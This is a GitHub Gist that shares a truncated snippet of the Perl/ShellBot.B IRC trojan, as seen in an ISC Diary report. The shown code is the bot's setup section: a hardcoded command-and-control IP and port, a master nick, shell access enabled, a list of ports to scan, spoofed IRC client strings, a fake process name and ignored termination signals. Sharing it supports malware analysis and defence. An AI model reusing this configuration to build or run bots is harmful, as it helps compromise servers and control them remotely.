Last active
January 1, 2016 06:59
-
-
Save jamesejr/8108423 to your computer and use it in GitHub Desktop.
A snippet of the Perl/ShellBot.B Trojan variant script observed from ISC Diary
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
my @mast3rs = ("pizza"); | |
my @hostauth = ("sosick.net"); | |
my @admchan=("#X"); | |
my @server = ("89.248.172.144"); | |
$servidor= $server[rand scalar @server] unless $servidor; | |
my $xeqt = "''"; | |
my $homedir = "/tmp"; | |
my $shellaccess = 1; | |
my $xstats = 1; | |
my $pacotes = 1; | |
my $linas_max = 5; | |
my $sleep = 6; | |
my $portime = 4; | |
my @fakeps = ("-bin"); | |
my @nickname = ("LINUX"); | |
my @xident = ("KAST"); | |
my @xname = (`uname -a`); | |
################# | |
# Random Ports | |
################# | |
my @rports = ("6667"); | |
my @Mrx = ("\001mIRC32 v5.91 K.Mardam-Bey\001","\001mIRC v6.2 Khaled Mardam-Bey\001", | |
"\001mIRC v6.03 Khaled Mardam-Bey\001","\001mIRC v6.14 Khaled Mardam-Bey\001", | |
"\001mIRC v6.15 Khaled Mardam-Bey\001","\001mIRC v6.16 Khaled Mardam-Bey\001", | |
"\001mIRC v6.17 Khaled Mardam-Bey\001","\001mIRC v6.21 Khaled Mardam-Bey\001", | |
"\001Snak for Macintosh 4.9.8 English\001", | |
"\001DvC v0.1 PHP-5.1.1 based on Net_SmartIRC\001", | |
"\001PIRCH98:WIN 95/98/WIN NT:1.0 (build 1.0.1.1190)\001", | |
"\001xchat 2.6.2 Linux 2.6.18.5 [i686/2.67GHz]\001", | |
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/2,00GHz]\001", | |
"\001xchat:2.4.3:Linux 2.6.17-1.2142_FC4 [i686/1.70GHz]\001", | |
"\001XChat-GNOME IRC Chat 0.16 Linux 2.6.20-8-generic [i686]\001", | |
"\001ircN 7.27 + 7.0 - -\001","\001..(argon/1g) :bitchx-1.0c17\001", | |
"\001ircN 8.00 ^_-^_ he tries to tell me what I put inside of me ^_-^_\001", | |
"\001FreeBSD!4.11-STABLE bitchx-1.0c18 - prevail[0123] :down with people\001", | |
"\001BitchX-1.0c19+ by panasync - Linux 2.4.31 : Keep it to yourself!\001", | |
"\001BitchX-1.0c19+ by panasync - Linux 2.4.33.3 : Keep it to yourself!\001", | |
"\001BitchX-1.1-final+ by panasync - Linux 2.6.18.1 : Keep it to yourself!\001", | |
"\001BitchX-1.0c19 by panasync - freebsd 4.10-STABLE : Keep it to yourself!\001", | |
"\001BitchX-1.1-final+ by panasync - FreeBSD 4.5-STABLE : Keep it to yourself!\001", | |
"\001BitchX-1.1-final+ by panasync - FreeBSD 6.0-RELEASE : Keep it to yourself!\001", | |
"\001BitchX-1.1-final+ by panasync - FreeBSD 5.3-RELEASE : Keep it to yourself!\001", | |
"\001bitchx-1.0c18 :tunnelvision/1.2\001","\001PnP 4.22 - http://www.pairc.com/\001", | |
"\001BitchX-1.0c17/FreeBSD 4.10-RELEASE:(c)rackrock/bX [3.0.1<C2>?9] : Keep it to yourself!\001", | |
"\001P&P 4.22.2 (in development) + X Z P Bots, Sound, NickServ, ChanServ, Extras\001", | |
"\001HydraIRC v0.3.148 (18/Jan/2005) by Dominic Clifton aka Hydra - #HydraIRC on EFNet\001", | |
"\001irssi v0.8.10 - running on Linux i586\001","\001irssi v0.8.10 - running on FreeBSD i386\001", | |
"\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.6mods v1.0 by acidflash - Almost there\001", | |
"\001ircII 20050423+ScrollZ 1.9.5 (19.12.2004)+Cdcc v1.8+OperMods v1.0 by acidflash - Almost there\001"); | |
# Default quick scan ports | |
my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501"); | |
# xeQt | |
#my $nick = "Power"; | |
my $nick = $nickname[rand scalar @nickname]; | |
my $realname = $xname[rand scalar @xname]; | |
my $ircname = $xident[rand scalar @xident]; | |
my $porta = $rports[rand scalar @rports]; | |
my $xproc = $fakeps[rand scalar @fakeps]; | |
my $Mrx = $Mrx[rand scalar @Mrx]; | |
my $version = 'PowerBots (C) GohacK'; | |
$SIG{'INT'} = 'IGNORE'; | |
$SIG{'HUP'} = 'IGNORE'; | |
$SIG{'TERM'} = 'IGNORE'; | |
$SIG{'CHLD'} = 'IGNORE'; | |
$SIG{'PS'} = 'IGNORE'; | |
# <-- snip --> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment